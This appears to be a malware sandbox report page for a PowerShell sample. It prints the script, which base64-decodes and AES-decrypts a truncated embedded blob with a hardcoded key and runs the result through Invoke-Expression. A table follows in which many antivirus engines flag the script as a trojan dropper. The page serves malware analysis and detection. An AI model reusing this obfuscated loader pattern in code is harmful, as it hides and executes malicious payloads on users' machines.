popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
$Base64EncodedEncryptedData = "YmZ5SnJORlF4clEyaExyZXZGYncvOVRKMmhNQlRJUUlpUXMzalk2N3FNWXhydllxcFBpN3A0b1M5dXVCdFlpRTF0YUlPMXMzY0YyR1F0Yk5rTWdlUWpVTks0VFB3dTBOeDNycUlveFdDNmd5NlRMVVRFN1h1dUdNc0VHbnBGZ09yempmL3R0WUpYQzNsYXVSTDZsVUtkREJhWlVvb0YxMnNnN2dFQlM2YjUwYVhZM09pRFk5eDVXWGRKUkFYU0lZZU4vMStsWnVKK284RGhhODB0MGw0YUdWdnQ2QjVldUJ0c0pLTGc4QS83eW1GVUptU2pBYmVvc2poWk5yZm5YUWNZSlg3bGdnMG9YbC9nM2ZtMk5zZDVOQ09GdTJKd2EzR0ZmQ1pOVzlWNzhHdmxDVk1lcHhmci9ZRXY3cDQzaWptaGZCTEc5RmZ3YWFaYjdGQlVrRkMxR0RuVFAvK2U3MmVRQ3FjR1dKcXExTXpLM3I2NmJHQnBGQTRxRE13MEJuMWRIUDYyNUFzamlFYlVwY2pmWnZwZCtGY1NPUlBDckRiNzNPSnJoaXFEMVdGdWlFdWNKdlN5aDZ4V3hIVm5TU1BOY3F4ZnF5SEpQbFh4Z3BraEJsN0cwVlFwakN1UUxZQmV3ZnkwZ1lXZGZmV1MrSVB6Q0d4WjM3M0xadER0VCtXZjFvelFRMGpLU2FCNzlZcUpVWlE4SytlRTlnNk1lZGFoMmEydnFaVG9IcngvRU5YMXJmU3A3SEFFbkdMMXUzTkpYbUR1SnY3NStnN2Y1QU8vVHcyUFVpYk9DeSs1RDdWN2dZdFVSNytyRWVlakpLd2h1YnV6T3lBclJpbmxSS2dVZHFlZ3JIYU81NW04VjZkempkWldyYkd6N2FzSHBlL3dTSytTb0V3UVFGQXVCZUQrOTZCS2U0aFVKc0lCRmoyUzhLL1NQeTRoQkJ2c05iSmJJUVl1SEZnaUVodGxJOW56NE1GcnVuQ
$DecodedEncryptedData = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($Base64EncodedEncryptedData))
$EncryptedData = $DecodedEncryptedData
$Key = "YourSecretKey1234"
$KeyBytes = (New-Object Security.Cryptography.SHA256Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes($Key))
$IV = New-Object byte[] 16
$EncryptedBytes = [Convert]::FromBase64String($EncryptedData)
$Aes = [System.Security.Cryptography.AesManaged]::new()
$Aes.Key = $KeyBytes
$Aes.IV = $IV
$Decryptor = $Aes.CreateDecryptor()
$MemoryStream = New-Object System.IO.MemoryStream
$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($MemoryStream, $Decryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
$CryptoStream.Write($EncryptedBytes, 0, $EncryptedBytes.Length)
$CryptoStream.Close()
$DecryptedData = $MemoryStream.ToArray()
$DecodedScript = [System.Text.Encoding]::UTF8.GetString($DecryptedData)
Invoke-Expression $DecodedScript
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX powershell.trojan.generic
CAT-QuickHeal Clean
Skyhigh BehavesLike.PS.Dropper.cn
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
huorong Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDropper.Agent.AQD
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Trojan.GenericKD.76163784
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.76163784
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb PowerShell.Packed.180
VIPRE Trojan.GenericKD.76163784
TrendMicro Clean
CMC Clean
Emsisoft Trojan.GenericKD.76163784 (B)
Ikarus Trojan-Dropper.PowerShell.Agent
FireEye Trojan.GenericKD.76163784
Jiangmin Clean
Varist PSH/Agent.TG
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D48A2AC8
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
GData Trojan.GenericKD.76163784
AVG Clean
Panda Clean
alibabacloud Clean
No IRMA results available.